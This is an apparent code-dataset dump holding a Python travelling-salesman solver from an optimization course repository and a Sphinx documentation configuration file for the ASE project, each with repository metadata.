return math.sqrt((point1.x - point2.x) ** 2 + (point1.y - point2.y) ** 2)
def tour_length(node_count, points, sol):
# calculate the length of the tour
obj = length(points[sol[-1]], points[sol[0]])
for index in range(0, node_count - 1):
obj += length(points[sol[index]], points[sol[index + 1]])
return obj
class NotRandomMatrix(object):
"""Random matrix."""
def __init__(self, points):
distance_max = 100
self.matrix = {}
for from_node in points:
self.matrix[from_node.id] = {}
for to_node in points:
if from_node == to_node:
self.matrix[from_node.id][to_node.id] = 0
else:
self.matrix[from_node.id][to_node.id] = length(from_node, to_node)
def Distance(self, from_node, to_node):
return self.matrix[from_node][to_node]
class DistanceMatrix:
def __init__(self, points):
self._points = points
# l = len(points)
#self._distances = array.array('I', [65535] * range(l*(l+1)/2))
def _distance(self, i, j):
return self._distanceP(self._points[i], self._points[j])
def _distanceP(p0, p1):
return math.sqrt((p0.x - p1.x) ** 2 + (p0.y - p1.y) ** 2) * 100
def _distanceBuffered(self, i, j):
if (j > i):
i, j = j, i
k = (i * (i + 1) / 2) + j
l = self._distances[k]
if l == 65535:
l = self._distance(i, j)
self._distances[k] = l
return l
def get(self, i, j):
return self._distance(i, j)
def obj(self, solution):
return sum([self._distanceP(s[0], s[1]) for s in segmentize(self._points)])
def make_clusters(points):
body = [[] for i in range(21)]
left = []
right = []
for point in points:
if point.y > 15000 and point.y < 590000 and (point.x < 55000 or point.x > 620000):
if point.x < 55000:
left.append(point)
else:
right.append(point)
else:
body[int(point.y / 30000)].append(point)
return (left, body, right)
def connection_cost(from_, to, cross, distances):
savings = distances.get(from_[0], from_[1]) + distances.get(to[0], to[1])
cost = distances.get(from_[1 if cross else 0], to[0]) + distances.get(from_[0 if cross else 1], to[1])
return cost - savings
def shift_and_reverse(what, shift, reverse):
d = deque(what)
d.rotate(len(what) - shift - 1)
if reverse:
d.reverse()
return d
def containing_rect(points):
x0 = points[0].x
y0 = points[0].y
x1 = x0
y1 = y0
for p in points:
if p.x < x0:
x0 = p.x
if p.y < y0:
y0 = p.y
if p.x > x1:
x1 = p.x
if p.y > y1:
y1 = p.y
dy = 1000
dx = 60000
return Rect(x0 - dx, y0 - dy, x1 + dx, y1 + dy)
def segmentize(points):
l = len(points)
s = [Segment(points[i], points[i + 1], i) for i in range(l - 1)]
s.append(Segment(points[-1], points[0], l))
return s
def in_rect(r, p):
return r.x0 <= p.x and r.y0 <= p.y and p.x <= r.x1 and p.y <= r.y1
def choose_with_rect(r, segments, points):
result = []
while len(result) == 0:
for s in segments:
if in_rect(r, points[s[0]]) or in_rect(r, points[s[1]]):
result.append(s)
r = Rect(r.x0, r.y0 - 1000, r.x1, r.y1 + 1000)
print (len(result))
return result
def insert_solution(solution, partial, distances):
if len(solution) == 0:
solution.extend(partial)
return
points = distances._points
rect = containing_rect([points[i] for i in partial])
print (rect)
segment_solution = segmentize(solution)
filtered_solution = choose_with_rect(rect, segment_solution, points)
segment_partial = segmentize(partial)
best_solution = segment_solution[0].id
best_partial = segment_partial[0].id
best_cross = False
best_cost = connection_cost(segment_solution[0], segment_partial[0], False, distances)
for s in filtered_solution:
for p in segment_partial:
for cross in (False, True):
cost = connection_cost(s, p, cross, distances)
if cost < best_cost:
best_solution = s.id
best_partial = p.id
best_cross = cross
best_cost = cost
solution[best_solution:best_solution] = shift_and_reverse(partial, best_partial, not best_cross)
def solve_and_save(cluster, filename):
l = len(cluster)
#print filename, l
if l > 0:
(objective, solution) = solve_routing(cluster, l)
f = open(filename, 'w')
for i in solution:
f.write(str(cluster[i].id) + "\n")
f.close()
def clusterize_and_save(points):
(left, body, right) = make_clusters(points)
solve_and_save(left, "clusters/left")
solve_and_save(right, "clusters/right")
_id = 0
for cluster in body:
solve_and_save(cluster, "clusters/body_%d" % _id)
_id += 1
def read_partial(name):
#print name
return [int(line.strip()) for line in open(name)]
def solve_clustered(points, nodeCount):
# clusterize_and_save(points)
dm = DistanceMatrix(points)
solution = []
for i in range(21):
partial = read_partial("clusters/body_%d" % i)
insert_solution(solution, partial, dm)
insert_solution(solution, read_partial("clusters/left"), dm)
insert_solution(solution, read_partial("clusters/right"), dm)
return (dm.obj(solution), solution)
def my_solver(points, nodeCount):
def Distance(i, j):
point1 = points[i]
point2 = points[j]
return math.sqrt((point1.x - point2.x) ** 2 + (point1.y - point2.y) ** 2)
# Set a global parameter.
param = pywrapcp.RoutingParameters()
param.use_light_propagation = FLAGS.light_propagation
pywrapcp.RoutingModel.SetGlobalParameters(param)
# TSP of size FLAGS.tsp_size
# Second argument = 1 to build a single tour (it's a TSP).
# Nodes are indexed from 0 to FLAGS_tsp_size - 1, by default the start of
# the route is node 0.
routing = pywrapcp.RoutingModel(nodeCount, 1)
parameters = pywrapcp.RoutingSearchParameters()
# Setting first solution heuristic (cheapest addition).
parameters.first_solution = 'PathCheapestArc'
# Disabling Large Neighborhood Search, comment out to activate it.
# parameters.no_lns = True
parameters.no_tsp = False
# Setting the cost function.
# Put a callback to the distance accessor here. The callback takes two
# arguments (the from and to node inidices) and returns the distance between
# these nodes.
routing.SetArcCostEvaluatorOfAllVehicles(Distance)
# Forbid node connections (randomly).
# rand = random.Random()
# rand.seed(FLAGS.tsp_random_seed)
# forbidden_connections = 0
# while forbidden_connections < FLAGS.tsp_random_forbidden_connections:
# from_node = rand.randrange(FLAGS.tsp_size - 1)
# to_node = rand.randrange(FLAGS.tsp_size - 1) + 1
# if routing.NextVar(from_node).Contains(to_node):
# print 'Forbidding connection ' + str(from_node) + ' -> ' + str(to_node)
# routing.NextVar(from_node).RemoveValue(to_node)
# forbidden_connections += 1
# Solve, returns a solution if any.
assignment = routing.SolveWithParameters(parameters, None)
if assignment:
# Solution cost.
#print assignment.ObjectiveValue()
# Inspect solution.
# Only one route here; otherwise iterate from 0 to routing.vehicles() - 1
route_number = 0
node = routing.Start(route_number)
route = ''
solution = []
while not routing.IsEnd(node):
route += str(node) + ' -> '
solution.append(int(node))
node = assignment.Value(routing.NextVar(node))
route += '0'
#print route
#print solution
else:
print ('No solution found.')
return solution
def solve_routing(points, nodeCount):
distanceMatrix = NotRandomMatrix(points)
routing = pywrapcp.RoutingModel(nodeCount, 1)
routing.UpdateTimeLimit(5 * 6)
parameters = pywrapcp.RoutingSearchParameters()
# Setting first solution heuristic (cheapest addition).
parameters.first_solution = 'PathCheapestArc'
# parameters.solution_limit = 10
parameters.guided_local_search = True
#parameters.simulated_annealing = True
#parameters.tabu_search = True
parameters.no_lns = True
def length_idx(i, j):
point1 = points[i]
point2 = points[j]
return math.sqrt((point1.x - point2.x) ** 2 + (point1.y - point2.y) ** 2)
cost = length_idx
print("setting dist")
routing.SetArcCostEvaluatorOfAllVehicles(cost)
#search_log = routing.solver().SearchLog(10000000, routing.CostVar())
#routing.AddSearchMonitor(search_log)
print("computing")
assignment = routing.SolveWithParameters(parameters, None)
solution = []
print(routing)
node = routing.Start(0)
while True:
solution.append(node)
print (solution)
node = assignment.Value(routing.NextVar(node))
return (assignment.ObjectiveValue(), solution)
def solve_mip(points, nodeCount):
distanceMatrix = DistanceMatrix(points)
solver = pywraplp.Solver('CP is fun!', pywraplp.Solver.CBC_MIXED_INTEGER_PROGRAMMING);
# GLPK_MIXED_INTEGER_PROGRAMMING
# CBC_MIXED_INTEGER_PROGRAMMING
# SCIP_MIXED_INTEGER_PROGRAMMING
print ("creating variables")
nodes = range(nodeCount)
x = [[solver.BoolVar('x%d_%d' % (i, j)) for j in nodes] for i in nodes]
print ("enter/exit just once")
for i in nodes:
solver.Add(x[i][i] == 0)
row = x[i]
solver.Add(solver.Sum(row) == 1)
column = [x[j][i] for j in nodes]
solver.Add(solver.Sum(column) == 1)
u = [solver.IntVar(0, nodeCount - 1, 'u%d' % i) for i in nodes]
solver.Add(u[0] == 0)
objective = solver.Objective()
for i in nodes:
for j in nodes:
if (i != j):
objective.SetCoefficient(x[i][j], distanceMatrix.get(i, j))
solver.Add(u[i] - u[j] + nodeCount * x[i][j] <= (nodeCount - 1))
#
# solution and search
#
print ("starting search")
solver.SetTimeLimit(1)
result_status = solver.Solve()
assert result_status == pywraplp.Solver.OPTIMAL
print ("WallTime:", solver.WallTime())
print ([[x[i][j].SolutionValue() for j in nodes] for i in nodes])
solution = []
current = 0
next = -1
while (next != 0):
solution.append(current)
for i in nodes:
if x[current][i].SolutionValue() > 0:
next = i
break
current = next
return (objective.Value(), solution)
def solve_it(input_data):
# Modify this code to run your optimization algorithm
print ("reading file")
# parse the input
lines = input_data.split('\n')
nodeCount = int(lines[0])
points = []
print ("converting")
_id = 0
for line in lines[1:-1]:
parts = line.split()
p = Point(_id, float(parts[0]), float(parts[1]))
points.append(p)
_id += 1
# build a trivial solution
# visit the nodes in the order they appear in the file
print ("calling solver")
solution = my_solver(points, nodeCount)
obj = tour_length(nodeCount, points, solution)
print (obj)
# prepare the solution in the specified output format
output_data = str(obj) + ' ' + str(0) + '\n'
output_data += ' '.join(map(str, solution))
return output_data
# from openopt import *
#import networkx as nx
ITER_MAX = 2000
#
def write_scip(node_count, points):
tsp = "/home/julien/scipoptsuite-3.0.1/scip-3.0.1/examples/TSP/tspdata/pr76.tsp"
data = open(tsp, "w")
data.write("NAME : " + str(node_count) + "\n")
data.write("COMMENT : RAS" + "\n")
data.write("TYPE : TSP" + "\n")
data.write("DIMENSION : " + str(node_count) + "\n")
data.write("EDGE_WEIGHT_TYPE : EUC_2D" + "\n")
data.write("NODE_COORD_SECTION" + "\n")
for i, p in enumerate(points, start=0):
data.write(str(i) + " " + str(p.x) + " " + str(p.y) + "\n")
data.write("\n")
data.close()
return
def scip(points, node_count):
write_scip(node_count, points)
# process = Popen(['/opt/scipoptsuite/scip-3.0.1/examples/Coloring/bin/coloring', '-f', 'coloring.col'])
# process = Popen(['/home/julien/scipoptsuite-3.0.1/scip-3.0.1/examples/TSP/runme.sh'])
#process = Popen(['/home/julien/scipoptsuite-3.0.1/scip-3.0.1/examples/TSP/bin/sciptsp', '-c', 'read ' + tsp, '-c', 'set limits time 120','-c', 'optimize', '-c','write problem coloring.tsp','-c','quit'])
# (stdout, stderr) = process.communicate()
# process.wait()
csol_solution = open("/home/julien/scipoptsuite-3.0.1/scip-3.0.1/examples/TSP/temp.tour", "r")
#csol_solution.readline()
#csol_solution.readline()
sol = []
for i, line in enumerate(csol_solution):
if i > 2:
print(line)
if len(line) > 0:
sol.append(int(line.split()[0]))
csol_solution.close()
return sol
# def oo_solution(points, node_count):
# G = nx.Graph()
# G.add_edges_from(\
# [(i,j,{'time': length(pi,pj), 'cost':length(pi,pj)}) for (i,pi) in enumerate(points) for (j,pj) in enumerate(points) if i != j ])
# p = TSP(G, objective = 'time', start = 0,maxFunEvals=1500000,maxIter=50000) #, [optional] returnToStart={True}|False, constraints = ..., etc
# r = [] # p.solve('sa') # also you can use some other solvers - sa, interalg, OpenOpt MILP solvers
# return ([r.nodes[i] for i in range(0,node_count)])
def solve_it2(input_data):
# Modify this code to run your optimization algorithm
# parse the input
lines = input_data.split('\n')
node_count = int(lines[0])
points = []
for i in range(1, node_count+1):
line = lines[i]
parts = line.split()
points.append(Point(float(parts[0]), float(parts[1])))
solution = scip(points, node_count)
print(solution)
obj = length(points[solution[-1]], points[solution[0]])
for index in range(0, node_count - 1):
obj += length(points[solution[index]], points[solution[index + 1]])
# prepare the solution in the specified output format
output_data = str(obj) + ' ' + str(0) + '\n'
output_data += ' '.join(map(str, solution))
return output_data
# def s_metropolis(t,N,s):
# n = random.randint(0,N-1)
# if f(n) <= f(s):
# return n
# else:
# if random.random()< exp(-(f(n)-f(s))/t):
# return n
# else:
# return s
def update_temp(is_increase, t):
epsilon = 0.01
if is_increase:
return t * (1 + epsilon)
else:
return max(t * 0.99,init_temp()/1000)
def init_sol():
input_data_file = open("./5.txt", 'r')
input_data = ''.join(input_data_file.readlines())
input_data_file.close()
return [int(i) for i in input_data.split(",")]
def sa_solution(points,node_count):
taboo_s = set([])
max_search = ITER_MAX * 5
#s = naive_solution(points,node_count)
s = init_sol()
min_val = tour_length(node_count, points, s)
t = init_temp()
s_min = s
s_real_min = s
real_min = min_val
taboo_s.add(min_val)
cx_hull = cx_indices(points,node_count)
for k in range(1,max_search):
current_value, s = try_swap2(s_min, node_count, points,cx_hull)
if current_value not in taboo_s:
if current_value <= min_val:
s_min = s
min_val = current_value
if current_value <= real_min:
s_real_min = s
real_min = current_value
#print("Min " +str(current_value) )
#taboo_s.add(min_val)
#print(min_val)
t = update_temp(False,t)
else:
if random.random() < math.exp(-(current_value-min_val)/t):
#print("Update cur " + str(current_value) + " min " + str(min_val) + "prob" + str(math.exp(-(current_value-min_val)/t)))
s_min = s
min_val = current_value
#taboo_s.add(min_val)
#print(min_val)
t = update_temp(False,t)
else:
#print("No update cur " + str(current_value) + " min " + str(min_val) + "prob" + str(math.exp(-(current_value-min_val)/t)))
t = update_temp(True,t)
if k%(max_search/10)==0:
print ( str(real_min) + " " + str(current_value))
s_real_min = ls_solution_given_init(node_count, points,s_real_min)
s_real_min = ls_solution_given_init2(node_count, points,s_real_min)
return s_real_min
def init_temp():
return 3
def trivial_solution(points,node_count):
# build a trivial solution
# visit the nodes in the order they appear in the file
return range(0, node_count)
def ls_solution_given_init(node_count, points, solution):
current_value = tour_length(node_count, points, solution)
cx_hull = cx_indices(points,node_count)
iter_max = ITER_MAX
for i in range(0, iter_max):
new_value, solution2 = try_swap2(solution, node_count, points,cx_hull)
if new_value < current_value:
# print new_value
current_value, solution = new_value, solution2
if i % (iter_max / 10) == 0:
print (current_value)
# print solution
for i in range(0,len(cx_hull)-2):
print (str(solution.index(cx_hull[i])) + " " + str(solution.index(cx_hull[i+1])))
return solution
def ls_solution_given_init2(node_count, points, solution):
current_value = tour_length(node_count, points, solution)
cx_hull = cx_indices(points,node_count)
iter_max = ITER_MAX * 200
for i in range(0, iter_max):
if random.randint(0,1)==0:
new_value, solution2 = try_swap2(solution,node_count, points,[])
else:
new_value, solution2 = try_swap(solution,node_count, points)
if new_value < current_value:
# print new_value
current_value, solution = new_value, solution2
if i % (iter_max / 10) == 0:
print current_value
# print solution
for i in range(0,len(cx_hull)-2):
print (str(solution.index(cx_hull[i])) + " " + str(solution.index(cx_hull[i+1])))
return solution
def ls_solution(points,node_count):
solution = naive_solution(points,node_count)
return ls_solution_given_init(node_count, points, solution)
def cx_indices(points,node_count):
solution = convex_hull(points)
point_set = {p:i for i,p in enumerate(points)}
solution2 = [point_set[p] for p in solution]
return solution2
def convex_hull(points):
"""Computes the convex hull of a set of 2D points.
Input: an iterable sequence of (x, y) pairs representing the points.
Output: a list of vertices of the convex hull in counter-clockwise order,
starting from the vertex with the lexicographically smallest coordinates.
Implements Andrew's monotone chain algorithm. O(n log n) complexity.
"""
# Sort the points lexicographically (tuples are compared lexicographically).
# Remove duplicates to detect the case we have just one unique point.
points = sorted(set(points))
# Boring case: no points or a single point, possibly repeated multiple times.
if len(points) <= 1:
return points
# 2D cross product of OA and OB vectors, i.e. z-component of their 3D cross product.
# Returns a positive value, if OAB makes a counter-clockwise turn,
# negative for clockwise turn, and zero if the points are collinear.
def cross(o, a, b):
return (a[0] - o[0]) * (b[1] - o[1]) - (a[1] - o[1]) * (b[0] - o[0])
# Build lower hull
lower = []
for p in points:
while len(lower) >= 2 and cross(lower[-2], lower[-1], p) <= 0:
lower.pop()
lower.append(p)
# Build upper hull
upper = []
for p in reversed(points):
while len(upper) >= 2 and cross(upper[-2], upper[-1], p) <= 0:
upper.pop()
upper.append(p)
# Concatenation of the lower and upper hulls gives the convex hull.
# Last point of each list is omitted because it is repeated at the beginning of the other list.
return lower[:-1] + upper[:-1]
# Example: convex hull of a 10-by-10 grid.
assert convex_hull([(i/10, i%10) for i in range(100)]) == [(0, 0), (9, 0), (9, 9), (0, 9)]
def get_rightmost(points):
val, idx = max((p.x, idx) for (idx, p) in enumerate(points))
return idx
def rank_simple(vector):
return sorted(range(len(vector)), key=vector.__getitem__)
def sort_closest_point(p_base, points):
l_min = 0
distance = [length(p_base, p) for p in points]
return rank_simple(distance)
def sort_by_x(points):
return [i for i,p in sorted(enumerate(points), key=lambda p: p[1].x)]
def compute_vector(p_in, p_out):
return Point(p_out.x - p_in.x, p_out.y - p_in.y)
def is_on_the_way(p_in , p_out , p_c ,eps):
v1 = compute_vector(p_in, p_out)
v2 = compute_vector(p_in, p_c)
return v1.x * v2.x + v1.y * v2.y + eps >= 0
def naive_solution(points,node_count):
cx_hull = cx_indices(points,node_count)
print(cx_hull)
solution = [p for p in cx_hull]
sorted_points = sort_by_x(points)
for p in sorted_points:
if p not in solution:
solution.append(p)
# solution = []
# i = 0
# for p in cx_hull:
# while points[sorted_points[i]].x <= points[p].x and sorted_points[i] not in cx_hull:
# solution.append(sorted_points[i])
# i += 1
# if sorted_points[i] == p:
# solution.append(p)
# i += 1
# if points[sorted_points[i]].x > points[p].x:
# solution.append(p)
#
# #print(i)
# while i < node_count:
# if sorted_points[i] not in cx_hull:
# solution.append(sorted_points[i])
# i += 1
# print(len(sorted_points))
# print([points[p].x for p in sorted_points])
# print(set(range(0,node_count)).difference(set(solution)))
# print([points[p] for p in set(range(0,node_count)).difference(set(solution))])
return solution
def swap_2_ranges(c1, c2, c3, node_count, solution,before):
inverse = random.randint(0,1)
if before:
solution2 = [solution[i] for i in range(0, c3+1)]
if inverse == 0:
for i in range(c1+1, c2+1):
solution2.append(solution[i])
else:
for i in range(c1+1, c2+1):
solution2.append(solution[c2 + 1 + c1 - i])
for i in range(c3+1, c1+1):
solution2.append(solution[i])
for i in range(c2+1, node_count):
solution2.append(solution[i])
else:
solution2 = [solution[i] for i in range(0, c1+1)]
for i in range(c2+1, c3+1):
solution2.append(solution[i])
if inverse == 0:
for i in range(c1+1, c2+1):
solution2.append(solution[i])
else:
for i in range(c1+1, c2+1):
solution2.append(solution[c2 + 1 + c1 - i])
for i in range(c3+1, node_count):
solution2.append(solution[i])
return solution2
def swap_range(c1, c2, node_count, solution):
solution2 = [solution[i] for i in range(0, c1+1)]
for i in range(c2, node_count):
solution2.append(solution[i])
inverse = random.randint(0,1)
if inverse == 0:
for i in range(c1+1, c2):
solution2.append(solution[i])
else:
for i in range(c1+1, c2):
solution2.append(solution[c2 + c1 - i])
return solution2
def try_swap2(solution,node_count, points,cx_hull):
a = random.random()
if cx_hull:
cx_point = random.randint(0,len(cx_hull)-1)
start = solution.index(cx_hull[cx_point])
if cx_point == len(cx_hull)-1:
end = node_count - 1
else:
end = solution.index(cx_hull[cx_point+1]) + 1
if end > node_count - 1:
end = node_count - 1
else:
start = -1
end = node_count - 1
if a < 0.8:
if end - 2 >= start:
if end - 2 == start:
c1 = start + 1
c2 = c1 + 1
else:
c1 = random.randint(start + 1, end-2)
c2 = random.randint(c1+1,end-1)
before = random.random()
if before<0.5:
c3 = random.randint(0,c1)
#print("c1 " + str(c1) + " c2 " + str(c2) + " c3 " + str(c3))
solution2 = swap_2_ranges(c1, c2, c3,node_count, solution,True)
else:
if c2 < node_count-2:
c3 = random.randint(c2+1,node_count-1)
solution2 = swap_2_ranges(c1, c2, c3,node_count, solution,False)
else:
solution2 = solution
else:
solution2 = solution
#print("c1 " + str(c1) + " " + str(solution[c1]) +" c2 " +str(c2) + " " + str(solution[c2])+ " " + str(solution[node_count-1]) )
#print(solution)
#print(solution2)
else:
if end-2>start:
c1 = random.randint(start,end-2)
c2 = random.randint(c1+1,end-1)
solution2 = swap(solution,c1,c2)
else:
solution2 = solution
new_value = tour_length(node_count, points, solution2)
return new_value, solution2
def try_swap(solution,node_count, points):
a = random.random()
if a < 0.5:
c1 = random.randint(0,node_count-2)
c2 = random.randint(c1+1,node_count-1)
solution2 = swap_range(c1, c2, node_count, solution)
#print("c1 " + str(c1) + " " + str(solution[c1]) +" c2 " +str(c2) + " " + str(solution[c2])+ " " + str(solution[node_count-1]) )
#print(solution)
#print(solution2)
else:
c1 = random.randint(0,node_count-2)
c2 = random.randint(c1+1,node_count-1)
solution2 = swap(solution,c1,c2)
new_value = tour_length(node_count, points, solution2)
return new_value, solution2
def swap(solution, c1, c2):
#print("node_count " + str(node_count) + " c1 " + str(c1) + " c2 " + str(c2))
solution2=[]
for i in solution:
solution2.append(i)
for i in range(c1, c2 + 1):
j = c2 - i + c1
#print("node_count " + str(node_count) + " i " + str(i) + " j " + str(j))
solution2[j] = solution[i]
#print(solution2)
#print(solution)
#print("sol2")
return solution2
def build_variable(node_in,node_out):
if node_in > node_out:
return pulp.LpVariable("x_in" + str(node_in) + "_out" + str(node_out) , 0,1, 'Binary')
else:
return 0.0
def find_out_node(node_in,out_edges,node_set,visited):
#print ("input " + str(node_in))
for node_out in node_set:
if out_edges[node_in][node_out] != 0.0:
if not(visited[node_in][node_out]):
if out_edges[node_in][node_out].value()>0.7:
#print ("out1 " + str(out_edges[node_in][node_out]))
return node_out,1
if out_edges[node_out][node_in] != 0.0:
if not(visited[node_out][node_in]):
if out_edges[node_out][node_in].value()>0.7:
#print ("out2 " + str(out_edges[node_out][node_in]))
return node_out,2
return None,0
def pulp_solution(points,node_count):
tsp = pulp.LpProblem("Tsp Model", pulp.LpMinimize)
node_set = range(0,node_count)
out_edges = [[build_variable(node_in,node_out) for node_in in node_set] for node_out in node_set]
#objective = pulp.LpAffineExpression([ (out_edges[i,k],i.value) for i in node_set for k in node_set))
#out_edges2 = [[1 for node_in in node_set] for node_out in node_set]
#print([out_edges2[node_out] for node_out in node_set])
#print([[out_edges2[node_in][node_out]*length(points[node_in], points[node_out]) for node_in in node_set ] for node_out in node_set])
tsp+= sum([sum([out_edges[node_in][node_out]*length(points[node_in], points[node_out]) for node_in in node_set ]) for node_out in node_set])
for node in node_set:
tsp += sum(out_edges[node][v] for v in node_set) + sum(out_edges[v][node] for v in node_set) == 2
tsp.solve()
for t in tsp.variables():
if t.value()>0.5:
print (str(t) + " " + str(t.value()))
out = [0]
visited = [[False for node_in in node_set] for node_out in node_set]
node_in = 0
while node_in is not None:
node_out,a = find_out_node(node_in,out_edges,node_set,visited)
if node_out is not None:
out.append(node_out)
if a == 1:
visited[node_in][node_out] = True
#print ("visited1 " + str(node_in) + " " +str(node_out))
else:
visited[node_out][node_in] = True
#print ("visited2 " + str(node_out) + " " + str(node_in))
node_in = node_out
print(out)
print(sorted(out))
return out
import sys
if __name__ == '__main__':
if len(sys.argv) > 1:
file_location = sys.argv[1].strip()
input_data_file = open(file_location, 'r')
input_data = ''.join(input_data_file.readlines())
input_data_file.close()
solution = solve_it(input_data)
f = open("solution", 'w')
f.write(solution)
f.close()
else:
print 'This test requires an input file. Please select one from the data directory. (i.e. python solver.py ./data/tsp_51_1)'
| 3like3beer/optimization | tsp/solver.py | Python | gpl-2.0 | 30,625 | [
"VisIt"
] | f9dba70b130b07e05287c2e09b0251a6beac6227469968d48cd2b8f83f858961 |
# -*- coding: utf-8 -*-
#
# ASE documentation build configuration file, created by
# sphinx-quickstart on Fri Jun 20 09:39:26 2008.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# The contents of this file are pickled, so don't put values in the namespace
# that aren't pickleable (module imports are okay, they're removed automatically).
#
# All configuration values have a default value; values that are commented out
# serve to show the default value.
import sys, os
# If your extensions are in another directory, add it here. If the directory
# is relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#sys.path.append(os.path.abspath('some/directory'))
sys.path.append('.')
# General configuration
# ---------------------
# Add any Sphinx extension module names here, as strings. They can be extensions
try:
from sphinx.ext import pngmath
ext_png_math = 'sphinx.ext.pngmath'
except ImportError:
ext_png_math = 'mathpng'
print 'Warning: sphinx uses custom mathpng.py: please update to sphinx >= 5.0'
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['ext', 'images',
'sphinx.ext.autodoc',
ext_png_math]
try:
from sphinx.ext import intersphinx
extensions.append('sphinx.ext.intersphinx')
except ImportError:
print 'Warning: no sphinx.ext.intersphinx available: please update to sphinx >= 5.0'
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The master toctree document.
master_doc = 'contents'
# General substitutions.
project = 'ASE'
copyright = '2008, CAMd'
# The default replacements for |version| and |release|, also used in various
# other places throughout the built documents.
#
# The short X.Y version.
try:
from ase.version import version
except ImportError:
version = '3.0.0'
# The full version, including alpha/beta/rc tags.
release = version
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
#unused_docs = []
# List of directories, relative to source directories, that shouldn't be searched
# for source files.
exclude_trees = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# Options for HTML output
# -----------------------
# The style sheet to use for HTML and HTML Help pages. A file of that name
# must exist either in Sphinx' static/ path, or in one of the custom paths
# given in html_static_path.
html_style = 'ase.css'
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (within the static path) to place at the top of
# the sidebar.
html_logo = '_static/ase.ico'
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
html_favicon = '_static/ase.ico'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_use_modindex = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, the reST sources are included in the HTML build as _sources/<name>.
#html_copy_source = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
html_file_suffix = '.html'
# Output file base name for HTML help builder.
htmlhelp_basename = 'ASEdoc'
# Options for LaTeX output
# ------------------------
# The paper size ('letter' or 'a4').
latex_paper_size = 'a4'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, document class [howto/manual]).
latex_documents = [
('contents', 'ase-manual.tex', 'ASE Manual', 'CAMd', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Additional stuff for the LaTeX preamble.
latex_preamble = '\usepackage{amsmath}'
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
# Example configuration for intersphinx: refer to gpaw.
intersphinx_mapping = {'http://wiki.fysik.dtu.dk/gpaw': None}
# sphinx.ext.pngmath manual configuration
# ---------------------------------------
pngmath_latex_preamble = '\usepackage{amsmath}\usepackage{amsfonts}\usepackage[active]{preview}'
# Additional arguments to give to dvipng, as a list.
# The default value is ['-gamma 1.5', '-D 110']
pngmath_dvipng_args = [
'-bgTransparent',
'-Ttight',
'--noghostscript',
'-l10',
'--depth',
'-D 136',
]
# correctly aligns the baselines
pngmath_use_preview = True
| slabanja/ase | doc/conf.py | Python | gpl-2.0 | 6,854 | [
"ASE",
"GPAW"
] | d595a021ba340766830bb9c38f09595d70dea9f77af397c52f7c342a6d986534 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.